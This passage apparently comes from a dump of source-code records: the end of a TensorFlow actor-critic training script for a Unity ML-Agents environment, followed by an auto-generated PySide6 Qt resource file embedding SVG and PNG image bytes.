**initKernelAndBias\n )\n\n layer2=tf.layers.dense(\n inputs=layer1,\n units=20,\n activation=tf.nn.relu,\n name='layer2',\n **initKernelAndBias\n )\n\n self.mu = tf.layers.dense(\n inputs=layer2,\n units=actionDim,\n activation=None,\n name='mu',\n **initKernelAndBias\n )\n self.norm_dist = tf.distributions.Normal(loc=self.mu,scale=[1.]*actionDim)\n self.var1=tf.get_variable_scope().global_variables()\n\n with tf.variable_scope(\"Actor2\"):\n layer1 = tf.layers.dense(\n inputs=self.s,\n units=20,\n activation=tf.nn.relu,\n name='layer1',\n **initKernelAndBias,\n trainable=False\n )\n\n layer2=tf.layers.dense(\n inputs=layer1,\n units=20,\n activation=tf.nn.relu,\n name='layer2',\n **initKernelAndBias,\n trainable=False\n )\n self.mu = tf.layers.dense(\n inputs=layer2,\n units=actionDim,\n activation=None,\n name='mu',\n **initKernelAndBias,\n trainable=False\n )\n self.norm_dist_behavior = tf.distributions.Normal(loc=self.mu,scale=[1.]*actionDim)\n self.sample_op = self.norm_dist_behavior.sample()\n self.var2=tf.get_variable_scope().global_variables()\n\n with tf.variable_scope('exp_v'):\n self.log_prob = self.norm_dist.log_prob(self.a)\n self.exp_v = tf.reduce_mean(self.log_prob*self.advantage)\n with tf.variable_scope('train'):\n self.train_op = tf.train.AdamOptimizer(learning_rate).minimize(-self.exp_v)\n with tf.variable_scope('assign'):\n self.assign_target_to_behavior=[tf.assign(r, v) for r, v in zip(self.var2, self.var1)]\n\n def choose_action(self, s):\n return self.sess.run(self.sample_op,feed_dict={\n self.s:s\n })\n def learn(self, s, a, advantage, step):\n if step % self.update_frequency == 0:\n self.sess.run([self.train_op, self.assign_target_to_behavior],feed_dict={\n self.s:s,\n self.a:a,\n self.advantage:advantage\n })\n else:\n self.sess.run(self.train_op,feed_dict={\n self.s:s,\n self.a:a,\n self.advantage:advantage\n })\n\nclass Critic(object):\n def __init__(self, sess, observationDim, learning_rate=0.01, gamma=0.95):\n self.sess= sess\n\n self.s = tf.placeholder(tf.float32, [1,observationDim],\"state\")\n self.r = tf.placeholder(tf.float32, [1,1],\"reward\")\n self.v_ = tf.placeholder(tf.float32, [1,1], \"value_of_next\")\n\n with tf.variable_scope('Critic'):\n layer1 = tf.layers.dense(\n inputs=self.s,\n units=30,\n activation=tf.nn.relu,\n name='layer1',\n **initKernelAndBias\n )\n layer2 = tf.layers.dense(\n inputs=layer1,\n units=10,\n activation=tf.nn.relu,\n name='layer2',\n **initKernelAndBias\n )\n self.v = tf.layers.dense(\n inputs=layer2,\n units=1,\n activation=None,\n name='Value',\n **initKernelAndBias\n )\n with tf.variable_scope('square_advantage'):\n self.advantage = tf.reduce_mean(self.r + gamma*self.v_-self.v)\n self.loss = tf.square(self.advantage)\n\n with tf.variable_scope('train'):\n self.train_op = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)\n\n def learn(self, s, r, s_):\n v_ = self.sess.run(self.v, feed_dict={\n self.s: s_\n })\n advantage, _ = self.sess.run([self.advantage, self.train_op], feed_dict={\n self.s: s,\n self.v_: v_,\n self.r: r\n })\n return advantage\n\nenv = UnityEnvironment()\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\nprint(brain.vector_observation_space_size)\nprint(brain.vector_action_space_size)\n\nsess = tf.Session()\n\nactor = Actor(\n sess=sess,\n observationDim=brain.vector_observation_space_size,\n actionDim=brain.vector_action_space_size[0],\n learning_rate=0.02,\n update_frequency=10\n)\ncritic = Critic(\n sess=sess,\n observationDim=brain.vector_observation_space_size,\n 
learning_rate=0.01,\n gamma=0.95\n)\n\nsess.run(tf.global_variables_initializer())\n\ntime=0\ngamma=0.9\nfor i_episode in range(5000):\n step=0\n discounted_reward=0\n observation = env.reset(train_mode=True)[brain_name]\n s=observation.vector_observations\n while True:\n time+=1\n step+=1\n action = np.squeeze(actor.choose_action(s), axis=0) \n # print(action)\n observation=env.step(action)[brain_name]\n \n reward=np.array(observation.rewards)\n discounted_reward*=gamma #有错\n discounted_reward+=reward[0]\n advantage = critic.learn(s,reward[np.newaxis,:],observation.vector_observations)\n advantage=[[advantage]]\n # print(advantage)\n actor.learn(s,action[np.newaxis,:],advantage, time)\n\n s=observation.vector_observations\n\n if observation.local_done[0]:\n print(\"episode:\", i_episode,\" steps:\", step,\" rewards:\", discounted_reward)\n break"} {"ext": "py", "sha": "1a2f3cd3370dbae7b4946f6dc729dbe64dad33be", "content": "# Resource object code (Python 3)\n# Created by: object code\n# Created by: The Resource Compiler for Qt version 6.2.0\n# WARNING! All changes made in this file will be lost!\n\nfrom PySide6 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x0b\\x1b\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a \\x0a \\x0a \\x0a \\x0a \\\n \\\nimage/svg+xml\\x0a \\\n \\x0a \\\n \\x0a \\\n \\x0a \\\n \\x0a <\\\n/metadata>\\x0a \\x0a \\x0a\\\n fx\\x0a\\x0a\\\n\\x00\\x00\\x02\\xf3\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x09\\xfd\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n \\x0d\\x0a image/s\\\nvg+xml\\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\\n\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x01\\x94\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x05\\xf8\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x09\\x8b\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a \\x0a \\x0a \\x0a \\\n i\\\nmage/svg+xml\\x0a \\\n \\x0a \\\n \\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a\\\n fx\\x0a\\x0a\\\n\\x00\\x00\\x0b\\xd2\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n i\\\nmage/svg+xml\\x0d\\x0a \\\n \\x0d\\\n\\x0a \\x0d\\x0a\\\n \\\n\\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\\n\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a CSV\\\n\\x0d\\x0a\\x0d\\\n\\x0a\\\n\\x00\\x00\\x01\\x8a\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x01\\xb2\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x01\\xe2\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x02g\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\\n\\x00\\x00\\x01n\\\n<\\\n?xml version=\\x221.\\\n0\\x22 
encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x92\\xc2\\\n\\x89\\\nPNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\\n\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x08\\x02\\x00\\x00\\x00{\\x1aC\\xad\\\n\\x00\\x00\\x00\\x01sRGB\\x00\\xae\\xce\\x1c\\xe9\\x00\\x00\\x00\\\n\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00\\\n\\x09pHYs\\x00\\x00\\x0e\\xc3\\x00\\x00\\x0e\\xc3\\x01\\xc7o\\\n\\xa8d\\x00\\x00\\x92WIDATx^\\xed\\x9d\\x07`\\\n\\x1c\\xc5\\xd5\\xc7wv\\xaf\\xaa7\\xdb*\\x96+\\xee\\xb8\\x00\\\n\\xee\\xc6\\x06SM\\x87PC \\x10 \\x01\\x02\\xa1\\x84\\x12\\\n\\xc2G\\x80@\\x12j\\x80$\\x94@ \\x94\\x00!\\xf4b\\\n\\xc0\\x06\\xe3\\x0666\\x06\\x83\\x1b\\xb87\\xf5^O\\xd7\\xb6\\\n|\\xef\\xcd\\x8e\\x84e\\xe9\\xa4k\\xaa\\xfb~:\\xddm\\x99\\\n\\x9d\\x9d\\x9d\\xf2\\xfe3\\xb3\\xb3\\xb3\\xcc0\\x0c\\x89 \\x08\\x82\\\n\\xb0\\x1e\\xb2\\xf8%\\x08\\x82 ,\\x06\\x09\\x00A\\x10\\x84E\\\n!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80\\\n \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\\n\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\\n\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\\n\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\\n\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\\n\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0\\\n($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\\n\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04\\\naQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\\n\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\\n\\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8b\\\nB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00\\\nA\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\\n\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\\n\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82\\\n ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0(\\\n$\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\\n\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04a\\\nQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01\\\n \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\\n\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\\n\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\\n\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\\n\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\\n\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 \\\n,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\\n\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04\\\nAX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQ\\\nH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\\n\\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\\n\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02\\\n@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\\n\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\\n\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82\\\n \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\\n\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\\n\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04A\\\nX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\\n\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\\n\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\\n\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\\n\\x10\\x04aQH\\x00\\x08\\x82 
,\\x0a\\x09\\x00A\\x10\\x84\\\nE!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\\n\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\\n\\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\\n\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04\\\nA\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\\n\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\\n\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\\n\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\\n\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\\n\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E\\\n!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80\\\n \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\\n\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\\n\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\\n\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\\n\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\\n\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0\\\n($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\\n\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04\\\naQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84Ea\\\n\\x86a\\x88E\\xa2_\\xc0\\x13\\xd4LS\\x06\\x7f\\xb0\\xca\\xf8\\\n\\x8a!1\\xd9\\x90\\x0c\\xa63P}fn#\\x08\\xc2\\xd2\\\n\\x90\\x00\\xf47L\\x01\\xd0\\xb4 \\xf3\\x96\\x1b\\x9eB\\x16\\xf0\\\nHL\\x97\\xec)\\xba;ON\\xca\\x91e\\x05\\xdc0\\x12\\\n\\x00\\x82 H\\x00\\xfa\\x1f\\x90\\xa0j\\xfd~m\\xcb3\\xb6\\\n\\xf2/\\xf4\\xfa\\xbd\\x92\\x04U~\\xa8\\xf83=q\\x04\\xcb\\\n>B\\x1fs\\x9d+c\\x08\\x09\\x00A\\x10\\x00\\x09@?\\\n\\x01\\xd2\\x11;x\\x0c\\xc9W\\xfa\\xad\\xf2\\xf9\\xcf%\\x7f\\xfd\\\n\\xc1V\\xde\\x90tp\\x90\\x98\\xcf\\x8e~N\\xc9\\x18\\x03\\xfb\\\n\\x18\\xa3;@\\x04ai\\xc8\\x04\\xf4\\x1f\\xc0\\xa6\\xab5;\\\n\\xe45\\xd7\\xca\\xbezq\\x17\\xe0\\x00\\x0c\\xbc# \\xb1\\xc6\\\nB\\xfd\\xb3\\x9f\\x1a\\xe5_\\xe3:A\\x10\\xd6\\x86\\x04\\xa0\\xff\\\n\\xa0k\\xba\\xfa\\xed\\x03Rc\\x91\\x0eu\\xff6\\xe6\\x9da\\\n_\\x10\\xfc\\x19\\xccW\\xed\\xff\\xfe\\x05CW\\xc5\\x0e\\x82 \\\n\\xac\\x0a\\x09@\\xffA-\\xfd\\xc2^\\xfc\\x09\\xef\\xdbi\\xf7\\\n6\\xaf\\xcc\\x9b\\x00\\xb8\\xdd^\\xbc4\\xd8Tan%\\x08\\\n\\xc2\\xb2\\x90\\x00\\xf4\\x17\\x0c]\\xde\\xf9*\\xd6\\xfd\\xc3Ak\\\n*Z\\xf7\\x86X&\\x08\\xc2\\xaa\\x90\\x00\\xf4\\x13\\x0c]5\\\n\\x9a\\xca\\x99\\xde\\xb6\\xef\\xa7\\x0d\\x86\\xa1\\x1bF\\xbe\\xb1Z\\xac\\\n\\x12\\x04aUH\\x00\\xfa\\x09\\x86\\xae\\xe9\\xbaf0\\xc9h\\\n{\\xff\\xf7 x\\xf7\\x90\\xe1k\\x14\\xab\\x04AX\\x15\\x12\\\n\\x80~\\x02S\\xec\\xcc\\xe6\\xc0\\x85\\xce\\xdb\\x00\\x06(\\x80\\x9a\\\n\\x98-\\xd6\\x08\\x82\\xb0*$\\x00\\xfd\\x04\\xc6\\x149s\\x12\\\n,t\\xfaX\\x07(\\x84\\xceXc\\xd6\\x99\\xf8\\xe8\\x80\\xae\\\n\\xd3\\x83 
\\x04aYH\\x00\\xfa\\x0b\\x8c\\xa9\\xc3/\\x94l\\\nn\\xec\\x04\\xea\\x10|^Lv&\\x0f>\\x0c\\x16\\xb1-\\\n@\\x10\\x84U!\\x01\\xe8?\\xb82F\\xfaF\\xdf(\\x85\\\n\\xf3|\\xaf\\xe6W\\x96\\x9e\\xe7m\\xa8\\xe6jA-\\x00\\x82\\\n\\xb0($\\x00\\xfd\\x07\\x83I\\x09\\x13.0\\xf2\\x8e\\xc1%\\\n\\xec\\xdf\\xe1\\xe8\\x12N\\x01a.\\xe2\\xf0\\x1fX\\xc7\\x87\\x01\\\nXS![\\xf5k_]\\x09\\x1e\\xc8\\xb7\\x83\\x03\\xee\\x0d\\\nA\\x10V\\x81\\xe6\\x02\\xea'\\x98\\xe9\\x88f>P\\xeb_\\\ns\\x97\\xad\\xe0\\x03\\xc9\\xc0G\\x7fq;\\x13I\\x0c?f\\\n\\x8f\\x8fxL\\xcc\\x90\\xb4\\xe4\\xa1\\xc6\\xb1\\xef8\\x923`\\\n\\x1d\\x9f\\x13\\xa3\\x1e!\\x82\\xb0\\x12$\\x00\\xfd\\x04L\\xc7f\\\n\\x03\\xaf\\xeb\\xaaQ\\xb8D\\xdb\\xf7\\xb1V\\xb5\\xc5\\xa6\\xd6\\xc1\\\n\\x96&-\\xc3\\x99;N\\x93\\x14\\xe7\\xbe\\xb7\\x0dC3\\xdd\\\n\\x81\\xbd\\x87\\xe3\\xb4\\xcc#\\xa4#\\x9ft\\xa4d\\xf3C\\xf9\\\nv\\xbeD\\x10D\\xbf\\x87\\x04\\xa0\\xdf\\x822\\x10\\xa8g\\x9a\\\n\\x0au{U\\xb7\\xdb\\x5cI\\x90\\xd4Mk\\xefq\\xec~\\\n\\x917\\x09t1\\x1b\\xa8!\\xe9\\xc9\\xc3\\xd4\\xe3\\xdeKH\\\nJE\\x1d\\x91\\x98L\\xb3\\x84\\x12\\x845 \\x01\\xe8\\xb7\\xf0\\\n\\x94E\\x83n\\xae\\xc1\\x87\\x19,\\xe0\\xf7hk\\xef\\xb0\\x15\\\n\\xbe'k\\x9a!\\xe3.p\\xc6\\x98\\xa1e\\xcd\\x90\\xe6\\xfc\\\n\\xdd\\x91\\x9c\\x83\\xdd@\\xd4\\x04 \\x08k@\\x02\\xd0oi\\\nNY\\xb0\\xe6\\xad\\x92XS\\x03\\xfeu\\x7fr\\xec|\\x11\\\nS_\\xbc.\\x066\\xcbz\\xfa\\xa1\\xc6Q/9\\x93\\xd2\\\n\\xcd\\xae!\\xd8KJ@\\x10\\xfd\\x1bj\\xec\\xf7[\\xd0~\\\n#-\\x0b\\x02\\xc5f\\xb7\\x1f~[0\\xffT\\xa8\\xf9\\x83\\\n\\x02\\xa0\\xa5\\xc7n\\x7fC\\xa9\\xda$\\xad\\xfce\\xa0\\xae\\x00\\\n\\x9b\\x0dmd\\x83 \\x88\\xfe\\x07\\x09\\x80\\x15\\xb1;\\xdd\\xb6\\\n\\xd9\\x0f\\x05\\x86\\x9d\\xc7g\\x0fm1\\xf4\\xa0\\x01\\xdf\\xb0/\\\n\\xae\\xf66\\xd5\\xf2U\\xaa\\xfe\\x13D?\\x87\\xba\\x80\\xa2\\xa4\\\n9\\xdexe\\x99\\x7f\\xfd\\xb8\\x8a@\\xed\\x9a\\xff\\xf6b|\\\n\\x9ez\\xf5\\xab\\xdb\\x1c\\x85\\x1f\\xe1\\x93\\x02\\xba\\xd1\\xd2\\xe5\\xa3\\\ng\\x1c.\\xcd}\\xca\\x914\\x08\\xaf\\x05\\xef\\x177\\xef \\\n\\x08\\xa2\\x7fA\\x02\\x10%\\x9a\\xa1\\x9b\\xad'MU\\x8d`\\\n\\x93\\xea\\xab\\x81e\\x9b+\\x9d9\\xdc\\x8a\\xe2\\xe8\\x13\\x02\\xa0\\\n\\x1b\\x86\\x1a\\xf0\\x06\\xbe\\xbe\\xcf\\xbe\\xfb%\\x99? 
\\x86]\\\nA\\xa8mL\\xcb\\x1e\\\nm\\xaa\\xd9\\xbf\\xd2+\\x0d(\\x5cO\\xc0\\xef\\xf1\\xaf\\xbb\\xcf\\\n\\xbd\\xe7\\x150\\xfb\\x07\\xday|F\\xec\\xa8\\x7f;\\x13R\\\na\\x19tOf\\x8a\\xb9\\x9d \\x88\\xfe\\x01\\x09@d\\x80\\\n\\xf1\\xd7\\xf6/\\xd2\\xd7\\xdc*\\x05\\x1b\\x98!\\x83\\xb5?\\xc8\\\n\\xacC|\\xf2a\\x94\\x1a\\x18LC\\x96\\x8d\\x99\\x0f\\xd8G\\\n\\x9cm\\xc8\\x8a\\xdc[;R\\xcc\\x0c\\x10\\x0c4\\x05V\\xdd\\\nl/\\xfaH\\xd65I\\xc6\\xce-\\xb3\\xadc\\xa4\\x8d\\x97\\\n\\x8e\\x86v\\x00\\xbe<@<8F\\x10D\\x7f\\x81\\x8at\\\nX\\x80\\x914\\x0c]\\xd7Uu\\xfb\\x8b\\xc6\\xea\\x9b\\xa4`\\\n#\\x98C>\\xaf~;6\\xdd\\xc0\\x1b\\xa7\\x0a\\x0e\\xae7\\\nt\\xf6\\xcd\\x9f\\x02[_\\xef\\xfd\\xb1lw$\\xd8f>\\\n\\x10\\x18r\\x9e\\xc1lh\\xf7\\xe1\\x0a\\xf8#d\\xacn\\xab\\\n\\xf1\\xe5M\\xbe\\xa6Z3\\x06@-P\\x16\\x08\\x82\\xe8\\x17\\\nP\\x0b ,x,\\x19j\\xd9\\xd7l\\xf9\\xe5z\\xb0\\x0e\\\nb\\x0d\\x05 \\x0c\\xc0\\xa1\\xccd}\\xfeK\\xf6\\xbc\\xb9\\xbd\\\n\\xb3\\x05\\xd0\\x02\\x5cc\\xc0\\xd7\\x10\\x5c}\\x8b\\xa3\\xe8c\\x9c\\\n(\\x02*\\x07<\\xbc`\\xf7\\xb5\\xf4\\xd1\\xf2\\xd1\\xaf;\\x92\\\n2\\xcc\\xeb\\xa6\\xa6\\x00A\\xf4\\x0f\\xa8$\\x87\\x8b\\x1e\\xf0\\xe9\\\n\\xeb\\xee4\\x02h\\xfd\\xc3\\x17M\\xbc\\xa7\\xaa\\xeb\\xc6\\xc6G\\\n\\xb0\\xd1\\xd0\\xcb1$\\xbb+\\xc9>\\xfb\\xe1\\xc0\\x88\\x9fI\\\n\\xcc\\xc6\\x1b\\x00&L\\xa9\\xd9i\\xac\\xbe\\xc6\\xefm\\x10\\x1b\\\n\\x08\\x82\\xe8\\x17\\x90\\x00t\\x02Z{n\\xef\\xf5=o\\xcb\\\n5?\\xa0\\x99\\x84\\x9a<\\x9fE'<\\x18N\\xc1S\\xbd\\\n\\xb1a\\xcfJ\\xfe\\xfeE>\\xda\\xb2W\\x82\\x93\\xc01\\xd9\\\n\\xe9NvL\\xbdC\\xcd=\\x1er\\x86y\\xe9X\\xe3g\\\n\\x92R\\xfe\\xa5\\xbc\\xe4,\\xd5S\\x81M!\\xd1\\x19Dm\\\nG\\x82\\xe8\\xdb\\x90\\x00t\\x82\\xd9o\\xa3\\xfa\\x1b\\xb5\\xddo\\\n\\xf0\\xbe\\xf1\\xc8\\xbaq\\xd0\\x5c\\x82\\x1fz\\xd0\\xb9\\xebi\\xbd\\\n\\x17[\\xff\\x03\\xb1;\\xddl\\xd6\\xc3\\x9e\\xa1\\x17@\\xd5\\x1f\\\n;\\xbb\\xf0\\x22\\x10V\\xb3K_}}\\xd0\\x07M\\x19>\\\n{P\\xf3v\\x82 \\xfa(}[\\x00x5\\x14L\\xd4\\\n\\x8f\\xdf|[\\xf3vN\\xcb\\x8ap\\x15!p\\x18|3\\\nO\\xa1\\xd2T\\xc2\\xf0\\x15+\\x91\\xc1\\xd0VBu\\x99\\xb1\\\n\\x9a\\xad5\\xe5\\xfbqC_\\xc0\\xe5Nv\\xcf\\xbc\\xdb\\x9f\\\n\\xbb\\x00.\\xd8\\x8cS\\xfcf\\x86R\\xb6\\x9a-:9\\xd0\\\nT\\x8bC]\\xf9\\x0d$\\x13q\\x18A\\x10}\\x8a~\\xd0\\\n\\x020{#\\xd0\\xbe\\xc3\\x0a\\xf6MhA]\\x0d\\xe8Z\\\n\\x80\\xbf\\xf9\\xc44N\\xf8\\xcdmV\\xe4\\xa6\\xca\\xf4\\xb6\\xb1\\\n\\xd0\\xf0V\\xf3W\\xa8G\\xe8\\x03\\xde3\\xc5\\x09\\xf6\\x99\\xe6\\\nK\\x09n\\x17\\x1b{7\\xd8\\xc3\\xc5d\\xbb\\xc3e\\x9b\\xf9\\\n\\x80\\x7f\\xf8Ex\\xcb\\x17\\xa3\\x17/\\x05\\xfb\\x83\\x1a\\xf7\\xeb\\\n\\xab~\\x13\\xf45`T\\x98\\x7f\\x04A\\xf4M\\xfa\\xf6(\\\n\\xa0\\xe6\\xc0\\xc3\\x0f\\xd3\\xfd\\x9e\\xfa\\xbd_\\xf8~\\xf8o\\x96\\\n\\xbcCV\\xfd\\x86\\x22{\\xa5\\x9c\\xa6\\x01'fM<\\x97\\\n%e*|\\xe0\\x0a\\xb8\\x8ex(\\x0e\\xb7q\\xea\\xae\\xb7\\\n\\xf5/o\\x94\\xb9\\xb5\\x8b\\xd4\\x03\\x13C\\x97\\xb4\\xa9w\\xba\\\n&\\x5c\\xd17\\x9a\\x00\\xcdq\\xab\\x06\\xfc\\x81/n\\xb0\\x15\\\n\\x7f$\\xeb\\xfa\\x8f\\xcf\\x07@c !O:e\\x99\\xcd\\\n\\x99\\x80\\xc2\\x8a\\x91\\xdaW.\\x8b 
\\x88\\x1f\\xe9\\x93\\x02`\\\n\\x86\\x19l\\x0e,hj@\\xda\\xf7\\x81\\xba\\xf7cV\\xb6\\\n\\x8ai\\x1e\\xd8\\xdcl\\xa2Q\\x15\\xd0\\x89l\\xd7R\\xc6)\\\n\\xf9\\xc7\\xb2\\x11\\xe7\\xdaR\\xf2p\\x0f\\xd6c\\xf9_\\x18\\xf0\\\ns\\x19\\xc1\\x9doI_\\xde\\x8c\\x86\\x0f\\xcc_T\\xc6\\x0e\\\n\\xbcQ\\xa7\\xdc\\xee\\x9a\\xf8\\xab.\\x7f\\xdfV\\xe8\\x14\\x8d\\xc8\\\nL\\x9b\\x17\\x0e\\x1f\\xbf\\xd7\\xa3}\\xfd'\\xfb\\xbe\\xff\\xc1&\\\n8\\xbeY\\x04\\x99\\x9e3G\\x9e\\xfb\\xb4\\xe2L\\xe2\\xbdD\\\n\\xe83\\xc9\\x00A\\xf4-\\xfap\\x17\\x10X\\x9d@\\xed^\\\n}\\xe1\\xf1\\xda\\xaa\\x9b\\xe4\\xe2%\\xb2\\xee\\xe5}\\x17\\xdc\\x0a\\\n\\xe1\\xc7\\x5c`\\xccPmu\\x9b\\xd8\\xa6G\\xa5\\x0f\\x8f\\xf5\\\n\\xee_\\xa5\\xe3\\xfc7:\\xda\\xe3p\\xc1W\\xab\\xcb6'\\\n7o\\xe1\\x1fu0\\x10\\x16\\xd9\\x91\\x1a\\xa6\\xea\\xc4B\\x9b\\\n 